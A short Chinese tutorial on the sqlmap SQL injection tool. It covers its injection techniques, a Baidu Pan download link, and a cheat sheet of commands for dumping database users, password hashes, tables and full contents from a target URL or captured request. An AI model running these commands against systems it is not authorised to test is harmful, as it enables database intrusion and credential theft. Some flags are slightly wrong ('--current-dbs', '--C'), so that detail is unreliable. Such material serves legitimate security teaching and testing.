介紹:
sqlmap是一個自動化的sql注入工具,其主要功能是掃描,發現並利用給定的URL進行sql注入,目前支持數據庫有mysql、oracle、access、postagesql、sql server、sqlite等
sqlmap采用了五種獨特的sql注入技術:
布爾類型的盲注,既可以根據返回頁面判斷條件真假的注入
時間的盲注,既不能根據頁面返回的內容判斷任何信息,要用條件語句查看時間延遲語句是否已經執行來判斷。
報錯注入,頁面會返回爆錯信息,或者把注入的語句的結果直接返回到頁面中
聯合查詢注入,可以使用union的情況下注入
堆疊注入,同時執行多條查詢語句注入。
注:sqlmap主要功能,數據庫指紋識別,數據庫枚舉,數據提取,訪問目標文件系統,並在獲取完全的操作權限執行任意命令。
說明:現如今在window中只有python2支持sqlmap工具使用,據我了解,python3如果要運行sqlmap需要改配置文件,具體沒有去查看。
鏈接:https://pan.baidu.com/s/1_Qzf4g-uUGD6ZTqVn5cT0Q
提取碼:nig1
安裝后我們可以使用 sqlmap -h查看。
基本語法:
sqlmap -u url --users :查看數據庫所有用戶
sqlmap -u url --passwords :查看數據庫所有用戶密碼
sqlmap -u url :判斷注入點
sqlmap -u url --current-dbs :查看當前所有數據庫
sqlmap -u url --current-user :查看數據庫當前的用戶
sqlmap -u url --is-dba :判斷當前用戶是否有管理員權限
sqlmap -u url --roles :列出數據庫所有管理員角色
sqlmap -u url --current-db :查看當前數據庫
sqlmap -u url -D 庫名 --tables :爆表
sqlmap -u url -D 庫名 -T 表明 --columns :爆字段
sqlmap -u url -D 庫名 -T 表明 --C 字段名1,字段名2 --dump :爆數據
sqlmap -u url -D 庫名 --dump-all :爆出數據庫中所有數據
如果我們想對抓取包進行爆破的話,
sqlmap -r http.txt :http.txt使我們抓取的http請求包
sqlmap -r http.txt -p username :指定參數,當有多個參數而你又知道username參數存在SQL漏洞,你就可以使用-p指定參數進行探測